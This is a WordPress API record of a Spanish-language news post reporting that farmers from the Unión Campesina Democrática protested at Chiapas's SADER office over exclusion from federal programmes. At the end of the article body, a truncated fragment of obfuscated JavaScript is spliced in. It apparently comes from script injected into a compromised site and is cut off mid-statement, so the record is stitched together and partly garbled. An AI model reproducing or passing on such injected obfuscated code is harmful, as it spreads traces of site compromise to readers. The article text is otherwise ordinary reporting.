{"id":9597,"date":"2023-04-18T03:21:32","date_gmt":"2023-04-18T03:21:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9597"},"modified":"2023-04-18T03:21:33","modified_gmt":"2023-04-18T03:21:33","slug":"campesinos-excluidos-de-programa-federal-toman-la-sader","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9597","title":{"rendered":"Campesinos excluidos de programa federal toman la SADER"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"323\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681788010848.jpg\" alt=\"\" class=\"wp-image-9598\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681788010848.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1681788010848-300x135.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 17 de abril del 2023. Tuxtla Guti\u00e9rrez.- Campesinos provienentes de diferentes municipios se manifestaron este lunes en la delegaci\u00f3n de la Secretar\u00eda de Agricultura y Desarrollo Rural (SADER) en demandas de que sean incluidos en los programas del gobierno federal<\/p>\n\n\n\n<p>Encabezados por Rafael s\u00e1nchez Victoria de la Uni\u00f3n Campesina Democr\u00e1tica lamentaron que la actual pol\u00edtica del gobierno federal hasta el campo vaya a la disminuci\u00f3n de los recursos a los campesinos y que muestra de ello es la iniciativa del gobierno federal tendiente a desaparecer Financiera Rural, lo que supone la estocada final ya que esta era el \u00faltimo reducto para ser beneficiado.<\/p>\n\n\n\n<p>Indic\u00f3 que el sector primario de producci\u00f3n ha sido el m\u00e1s afectado. Detallo que el padr\u00f3n del programar &#8220;Bienestar&#8221; tuvo una disminuci\u00f3n de 2 millones 800 mil productores a 1 mill\u00f3n 900 mil.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que por esta situaci\u00f3n las organizaciones del Congreso Agrario Permanente, encabezadas por la Uni\u00f3n Campesina Democr\u00e1tica dar\u00e1n inicio a una jornada de movilizaciones para incidir en un cambio en la pol\u00edtica agropecuaria del pa\u00eds.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 17 de abril del 2023. Tuxtla Guti\u00e9rrez.- Campesinos provienentes de diferentes municipios se manifestaron este lunes en la delegaci\u00f3n de la Secretar\u00eda de Agricultura y Desarrollo Rural (SADER) en demandas de que sean incluidos en los programas del gobierno federal Encabezados por Rafael s\u00e1nchez Victoria de la Uni\u00f3n Campesina Democr\u00e1tica lamentaron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9598,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9597","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9597","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9597"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9597\/revisions"}],"predecessor-version":[{"id":9599,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9597\/revisions\/9599"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9598"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9597"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9597"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9597"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}